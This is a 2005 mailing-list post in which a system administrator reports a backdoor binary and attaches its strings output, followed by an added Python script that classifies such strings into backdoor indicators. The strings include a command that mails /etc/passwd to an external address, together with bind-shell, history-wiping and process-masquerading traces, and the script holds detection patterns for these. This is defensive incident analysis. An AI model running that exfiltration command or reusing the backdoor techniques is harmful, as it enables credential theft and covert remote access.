
From Marco Bertorello <marco@nosgoth.homelinux.org>
Date Wed, 9 Nov 2005 15:41:21 +0100
Subject [Hackmeeting] backdoor


Hi all,

I found an extremely suspicious file (/tmp/ownz), owned by the user
nobody.

It is an executable binary, and strings revealed it to be a backdoor, but
I can't find any information on what kind of backdoor it is or what it
does (apart from sending the passwd[1] to an e-mail address).

Does anyone know anything about it? The output of strings is attached.

Thanks, bye

[1] As a side note: with only the passwd, but without the shadow... what
can one do with it?!?

-- 
Marco Bertorello 		System Administrator
Linux Registered User #319921	marco@bertorello.ns0.it

"Meeting Bill Gates was the second of my dreams; the first is to visit
Disneyland" - Arfa Karim


Attachment: ownz.txt (output of strings)

/lib/ld-linux.so.2
SuSE
_Jv_RegisterClasses
__gmon_start__
libc.so.6
strcpy
waitpid
ioctl
printf
recv
execve
perror
dup2
system
socket
select
bzero
setpgid
send
alarm
accept
write
kill
bind
chdir
setsockopt
memchr
signal
read
listen
fork
memset
ntohs
strcmp
htons
atoi
_IO_stdin_used
_exit
__libc_start_main
strlen
open
setsid
close
getsockname
GLIBC_2.0
PTRh
TERM=xterm
SHELL=/bin/bash
PS1=\[\033[1;30m\][\[\033[0;32m\]\u\[\033[1;32m\]@\[\033[0;32m\]\h \[\033[1;37m\]\W\[\033[1;30m\]]\[\033[0m\]# 
HISTFILE=/dev/null
HOME=/var/tmp
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:./bin:/var/tmp:/var/tmp/bin
pqrstuvwxyzabcde
0123456789abcdef
/dev/ptmx
/dev/pty
/dev/tty
/dev/null
Can't open a tty, all in use ?
Can't fork subshell, there is no way...
/var/tmp
/bin/sh
Can't execve shell!
USAGE: %s [PORT=1535]
:: Starting backdoor daemon ::
cat /etc/passwd|mail -s '0wnz4ever 1535' elzorg@gmail.com
socket
setsockopt
bind
listen
getsockname
Listening to port %d
FUCK: Can't fork child (%d)
:: Done, pid=%d ::
klogd
P554 SMTP 
0wnz4ever
500 Error: bad syntax
.:: #rohack GROUP ::.
.:: Do not distrubute ::.
.:: by Zorg & seby_` ::.

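As an added example (not part of the original post, and not code from the binary's authors), here is a small Python triage helper for exactly this situation: it takes the kind of `strings` output attached above and groups it into indicators. The libc imports socket/bind/listen/accept together with fork, dup2 and execve are the classic shape of a bind shell; /dev/ptmx, /dev/pty and /dev/tty point at pty allocation for an interactive session; HISTFILE=/dev/null, the bare process name `klogd` and the `cat /etc/passwd|mail -s ...` pipeline are anti-forensics, masquerading and exfiltration indicators. The rule names, the categories and the BENIGN_STRINGS control list are my own; OWNZ_STRINGS is a subset of the strings posted above.

```python
"""Heuristic triage of `strings` output from a suspicious Linux binary.

Added example, not code from the original post or from the binary's authors.
It takes the printable strings of an ELF (what `strings -a /tmp/ownz` prints),
groups them into indicator categories and derives a one-line verdict. The
indicator rules are generic heuristics; OWNZ_STRINGS is a subset of the list
attached to the post, BENIGN_STRINGS is a constructed control sample.
"""
import re
from collections import OrderedDict

# Groups of libc imports that, taken together, point to one behaviour.
SYMBOL_RULES = OrderedDict([
    ("network listener",         {"socket", "bind", "listen", "accept"}),
    ("socket-to-fd redirection", {"dup2"}),
    ("subprocess / shell spawn", {"fork", "execve"}),
    ("daemonisation",            {"setsid", "setpgid"}),
])

# Regexes matched against every string individually.
STRING_RULES = [
    ("pty allocation (interactive shell)", re.compile(r"^/dev/(ptmx|pty|tty)$")),
    ("shell binary path",                  re.compile(r"^/bin/(ba)?sh$")),
    ("history disabled (anti-forensics)",  re.compile(r"^HISTFILE=/dev/null$")),
    ("credential file read",               re.compile(r"/etc/(passwd|shadow)")),
    ("exfiltration via local mail",        re.compile(r"\bmail\s+-s\b")),
    ("process-name masquerading",          re.compile(r"^(klogd|syslogd|sshd|kthreadd|crond)$")),
]

PORT_RE  = re.compile(r"PORT=(\d+)")                     # e.g. "USAGE: %s [PORT=1535]"
CRED_RE  = re.compile(r"/etc/(?:passwd|shadow)")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def triage(strings):
    """Map each triggered indicator label to the strings that triggered it."""
    syms = set(strings)
    found = OrderedDict()
    for label, needed in SYMBOL_RULES.items():
        if needed <= syms:                      # every import of the group is present
            found[label] = sorted(needed)
    for label, pattern in STRING_RULES:
        hits = [s for s in strings if pattern.search(s)]
        if hits:
            found[label] = hits
    return found


def default_port(strings):
    """Port advertised in a USAGE line, or None if there is no such line."""
    for s in strings:
        m = PORT_RE.search(s)
        if m:
            return int(m.group(1))
    return None


def credential_files(strings):
    """Credential file paths named anywhere in the strings."""
    return sorted({m.group(0) for s in strings for m in CRED_RE.finditer(s)})


def exfil_targets(strings):
    """E-mail addresses embedded anywhere in the strings (possible exfil sinks)."""
    return [addr for s in strings for addr in EMAIL_RE.findall(s)]


def verdict(strings):
    """One-line summary an analyst can paste into an incident note."""
    found = triage(strings)
    parts = []
    if {"network listener", "socket-to-fd redirection", "subprocess / shell spawn"} <= set(found):
        desc = "bind shell"
        port = default_port(strings)
        if port is not None:
            desc += " on default port %d" % port
        if "pty allocation (interactive shell)" in found:
            desc += " with pty"
        parts.append(desc)
    if "process-name masquerading" in found:
        parts.append("masquerades as " + ", ".join(found["process-name masquerading"]))
    if "exfiltration via local mail" in found:
        parts.append("mails %s to %s" % (", ".join(credential_files(strings)) or "data",
                                         ", ".join(exfil_targets(strings)) or "unknown recipient"))
    if "history disabled (anti-forensics)" in found:
        parts.append("disables shell history")
    return "; ".join(parts) if parts else "no backdoor indicators"


# Subset of the `strings` output attached to the post (quoted-printable decoded).
OWNZ_STRINGS = [
    "libc.so.6", "strcpy", "waitpid", "ioctl", "recv", "execve", "dup2", "system",
    "socket", "select", "setpgid", "send", "alarm", "accept", "bind", "setsockopt",
    "signal", "listen", "fork", "setsid", "getsockname",
    "TERM=xterm", "SHELL=/bin/bash", "HISTFILE=/dev/null", "HOME=/var/tmp",
    "/dev/ptmx", "/dev/pty", "/dev/tty", "/dev/null",
    "Can't open a tty, all in use ?", "/var/tmp", "/bin/sh", "Can't execve shell!",
    "USAGE: %s [PORT=1535]", ":: Starting backdoor daemon ::",
    "cat /etc/passwd|mail -s '0wnz4ever 1535' elzorg@gmail.com",
    "Listening to port %d", "klogd", "P554 SMTP ", "0wnz4ever", "500 Error: bad syntax",
]

# Constructed control sample: roughly what a hello-world binary exports.
BENIGN_STRINGS = ["/lib/ld-linux.so.2", "libc.so.6", "printf", "__libc_start_main",
                  "GLIBC_2.0", "Hello, world"]


if __name__ == "__main__":
    import sys
    # Pipe `strings -a <binary>` into this script; with no stdin it uses the sample.
    lines = [l.rstrip("\n") for l in sys.stdin] if not sys.stdin.isatty() else OWNZ_STRINGS
    for label, hits in triage(lines).items():
        print("%-36s %s" % (label, ", ".join(hits)))
    print("verdict:", verdict(lines))
```

Strings are only a heuristic: the same binary also imports getsockname and prints "Listening to port %d", so the confirming checks on the live host are a listener on the reported port (`ss -lntp` or `netstat -anp`), a process whose name is `klogd` but whose `/proc/<pid>/exe` resolves to /tmp/ownz, and the `nobody` user's outgoing mail in the MTA queue or logs.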
_______________________________________________
Hackmeeting mailing list
Hackmeeting@inventati.org
https://www3.autistici.org/mailman/listinfo/hackmeeting
